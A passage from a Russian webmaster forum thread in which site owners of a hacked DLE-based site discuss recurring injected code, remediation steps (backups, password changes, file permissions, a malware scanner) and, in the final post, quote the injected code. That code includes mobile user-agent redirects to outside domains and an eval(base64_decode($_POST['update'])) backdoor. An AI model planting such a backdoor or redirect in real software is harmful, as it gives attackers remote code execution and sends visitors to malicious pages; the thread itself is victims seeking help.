Переход с посиковика не на мой сайт!

D3
На сайте с 11.07.2009
Offline
39
#41
Prorok2010:
Ибо я сам точно не все вылечу!

У Вас после удаления снова появляется этот код в index? Восстановите бекап если есть, желательно дня за 3-5 до появление проблемы, обновить движек (по желанию), смените пароль на ФТП, поставте запрет на запись в index.php, если не поможет тогда уже надо рыться искать.

Я пока что сделал все так описал, с 9 утра пока траф идет как обычно.

P2
На сайте с 24.02.2013
Offline
2
#42

Бэк нету(

пароли сменил

поставил запрет на запись в index.php

K5
На сайте с 25.02.2013
Offline
1
#43
igor3333:
скрипт проверки айболит http://revisium.com/ai/

Спасибо! С помощью этого скрипта нашел изменения в след. файлах:

./engine/data/dbconfig.php

./engine/engine.php

./engine/init.php

./index.php

Напихано много было. Пока что сайты нормально работают.

MudryiKaa
На сайте с 31.01.2010
Offline
143
#44
Prorok2010:
А заказать проверку дорого это стоит? Ибо я сам точно не все вылечу!

Я подавал заказ - 1900 рулей это стоит.

---------- Добавлено 25.02.2013 в 19:31 ----------

kvadrat58:
Спасибо! С помощью этого скрипта нашел изменения в след. файлах:
./engine/data/dbconfig.php
./engine/engine.php
./engine/init.php
./index.php
Напихано много было. Пока что сайты нормально работают.

Если б еще соображать, что там напихано. Я тоже проверил - посмотрел на отчет, заплакал и закрыл...

---------- Добавлено 25.02.2013 в 19:32 ----------

По факту - сегодня вся эта байда повторилась. Опять в индекс.пхп всякие записи. Удали - заработало. А как поставить запрет на запись в php файлы?

Здесь (http://webmasters.leadpush.ru/?ref=kGzamTENhj) адвокаты, риелторы и банки платят 100-500 рублей за клиента!!! Готовые СЯ для дорвеев и СДЛ.
K5
На сайте с 25.02.2013
Offline
1
#45
MudryiKaa:
Если б еще соображать, что там напихано.

Я просто сравнил с оригинальными файлами. В отчете тоже много всего было, но воспользовался лишь рекомендациями в первой части. Пока сайты работают, подгоняю свои шаблоны под 9.8. А чтобы запретить запись в файлы - поставь права доступа 444. Да, еще в админке сделал снимок антивирусом, чтобы в случае чего, было видно, какие файлы изменены.

Onlywotnet
На сайте с 04.12.2012
Offline
17
#46

Добрый день.

У меня аналагчная ситуация. Удалил утром код этот, вечером опять вернулся но уже немного короче.

Все для World of Tanks (http://4-wot.ru)
MudryiKaa
На сайте с 31.01.2010
Offline
143
#47

Задолбали эти хакеры - третий раз код возвращается. Уже не знаю, что и делать...

M
На сайте с 21.10.2009
Offline
67
#48

И у меня снова редиректы сегодня.. Бекапа нет старого.

Еще и код сапы вирусняк сносит, похоже.

Onlywotnet
На сайте с 04.12.2012
Offline
17
#49

./engine/data/dbconfig.php

./engine/engine.php

./engine/init.php

Вот эти файлы все проверьте. Тут идет перелинк с андроидов, телефонов и тд. Скачивается какая то параша. Что то серьезное творится. Надо лицензию брать.

P2
На сайте с 24.02.2013
Offline
2
#50
Onlywotnet:
./engine/data/dbconfig.php
./engine/engine.php
./engine/init.php

Вот эти файлы все проверьте. Тут идет перелинк с андроидов, телефонов и тд. Скачивается какая то параша. Что то серьезное творится. Надо лицензию брать.

Нашел в ./engine/data/dbconfig.php

Что там лишнего?

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://yandex-google.ws/');

if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));

if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://live-internet.ws/');

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий